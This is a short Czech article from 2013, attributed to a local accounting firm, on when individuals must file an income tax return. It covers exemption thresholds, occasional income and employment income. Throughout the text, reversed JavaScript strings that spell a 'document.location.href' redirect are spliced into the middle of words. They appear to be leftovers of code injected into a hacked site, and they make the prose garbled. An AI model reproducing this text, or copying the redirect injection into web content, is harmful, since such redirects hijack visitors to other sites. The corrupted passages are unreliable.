Žďár nad Sázavou, zdar nad sazavou, aktuality, doprava, blaha, účetnictví
Rainbow page separator

Kdy musím podat daňové přiznání?

Pondělí, 25. března 2013

priznank-k-dpfoPokud mám příjmy pouze podle §10 odst.3 zákona o daních z příjmů pak platí, že ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příjmy jsou osvobozeny od daně, pokud jejich úhrn za zdaňovací období nepřesáhne  20 000 Kč a tudíž nevzniká povinnost podat daňové přiznání.

O jaké příjmy se jedná? Jde zejména o příjmy z příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostných činnosti nebo z příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostného pronájmu movitých věcí. Dále o příjmy ze zemědělské činnosti, která není provozována podnikatelem.

Zjednodušeně pak platí, že pokud na danou činnost existuje živnostenské oprávnění, nejedná se o příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostnou činnost byť by byla vykonávána nepravidelně,ale jedná se o podnikání.

Daňové přiznání nemusím také podávat v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případech:

* Pokud moje  příjmy, které jsou předmětem daně z příjmů, nepřesáhnou     15 000 Kč, dále pokud se jedná o příjmy, které jsou od daně osvobozené, nebo jsem měl  příjmů, ze kterých byla odvedena srážková daň. To se vztahuje i na příjmy z podnikání. Pokud však podnikání skončilo ztrátu, přiznání podat musím.

* Pokud jsem dosáhl příjmů ze zaměstnání  pouze od jednoho zaměstnavatele nebo postupně od více zaměstnavatelů a zároveň jsem u všech podepsal prohlášení. Pokud jsem měl i jiné příjmy kromě ze zaměstnání a ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nepřesáhly  6000 Kč za rok, také nemusím podávat daňové přiznání.

I když z podnikání v průběhu roku nedosahuji žádných příjmů, musím odvádět zálohy na zdravotní a sociální pojištění v minimální předepsané výši a po skončení zdaňovacího období podat přehledy.

Článek připravil:

Účetní firma Ing. Aleš Blaha – profesionální vedení účetnictví Žďár nad Sázavou